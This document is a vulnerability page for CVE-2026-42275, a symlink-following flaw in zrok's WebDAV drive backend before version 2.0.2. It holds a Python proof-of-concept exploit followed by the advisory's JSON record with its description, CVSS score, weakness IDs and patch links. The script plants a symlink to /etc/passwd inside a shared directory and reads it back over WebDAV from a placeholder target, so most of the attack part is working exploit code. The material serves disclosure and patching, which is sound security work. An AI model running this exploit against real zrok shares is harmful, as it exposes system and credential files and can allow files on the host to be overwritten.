CVE-2026-42275

#!/usr/bin/env python3 """ PoC for CVE-2026-42275 (zrok Symlink Following) This script demonstrates how a symlink inside the shared DriveRoot bypasses path traversal restrictions. """ import os import requests # Configuration WEBDAV_URL = "http://target-zrok-instance/public/" # The zrok share URL MALICIOUS_LINK_NAME = "etc_passwd_link" TARGET_FILE = "/etc/passwd" def create_symlink_in_share(): """ Simulates creating a symlink in the shared directory. In a real scenario, this might be done via WebDAV PUT if allowed, or by an insider/third-party mechanism. """ print(f"[+] Creating symlink '{MALICIOUS_LINK_NAME}' -> '{TARGET_FILE}'...") try: os.symlink(TARGET_FILE, MALICIOUS_LINK_NAME) print("[+] Symlink created successfully.") except Exception as e: print(f"[-] Failed to create symlink: {e}") def exploit_symlink(): """ Attempts to read the file through the symlink via WebDAV. """ print(f"[+] Attempting to read '{MALICIOUS_LINK_NAME}' via WebDAV...") url = f"{WEBDAV_URL}{MALICIOUS_LINK_NAME}" try: response = requests.get(url) if response.status_code == 200: print("[+] Exploit successful! File content retrieved:") print("-" * 20) print(response.text[:200]) # Print first 200 chars print("-" * 20) else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] Request failed: {e}") if __name__ == "__main__": # Step 1: Setup the malicious symlink create_symlink_in_share() # Step 2: Access the file remotely # Note: In a real attack, the attacker uses a WebDAV client like cadaver or curl. # Here we simulate the HTTP GET request. exploit_symlink()

{"cve": {"id": "CVE-2026-42275", "sourceIdentifier": "[email protected]", "published": "2026-05-08T04:16:22.823", "lastModified": "2026-05-08T20:03:27.130", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "zrok is software for sharing web services, files, and network resources. Prior to version 2.0.2, the zrok WebDAV drive backend (davServer.Dir) restricts path traversal through lexical normalization but does not prevent symlink following. When a symbolic link inside the shared DriveRoot points to a location outside that root, remote WebDAV consumers can read files and—on shares without OS-level permission restrictions—write or overwrite files anywhere on the host filesystem accessible to the zrok process. This issue has been patched in version 2.0.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 5.8}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}, {"lang": "en", "value": "CWE-61"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:netfoundry:zrok:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.0.2", "matchCriteriaId": "FC1325D6-16B3-4739-B913-E20275292B01"}]}]}], "references": [{"url": "https://github.com/openziti/zrok/commit/459bcfc1e121decae1b1d11c37ad94e4ed5bbf2e", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openziti/zrok/releases/tag/v2.0.2", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/openziti/zrok/security/advisories/GHSA-74m3-9qvm-rp9h", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}